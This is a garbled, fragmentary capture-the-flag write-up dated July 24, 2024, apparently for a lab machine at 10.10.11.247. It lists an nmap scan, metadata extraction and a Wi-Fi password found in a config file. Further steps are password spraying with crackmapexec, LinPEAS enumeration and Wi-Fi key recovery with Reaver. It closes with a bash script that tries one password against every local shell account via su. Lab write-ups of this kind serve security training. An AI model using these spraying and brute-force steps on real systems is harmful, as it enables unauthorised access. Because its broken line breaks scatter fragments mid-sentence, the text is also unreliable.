Jul 24, 2024
-sC -sV -oA wifi_network 10.10.11.247
.
wget
.exiftool
for metadata.tar xvf
.netadmin
in the /etc/passwd
file.very_unique_wifi_password_1
in wireless config file.users.txt
and sprayed found password using crackmapexec
.netadmin
.LinPEAS
to check for vulnerabilities or misconfigurations.Reaver
with special capabilities (cap_net_raw
).reaver -i mon0 -b <BSSID>
extracted the Wi-Fi pre-shared key.#!/bin/bash
users=$(awk -F: '($NF ~ "sh$"){print $1}' /etc/passwd)
for user in $users; do
echo "Trying password for $user"
echo '$1' | timeout 2 su -c "whoami" $user
if [ $? -eq 0 ]; then
echo "Success: $user"
exit
fi
done
nmap
, ftp
, wget
, exiftool
, LinPEAS
, and Reaver
for network penetration testing.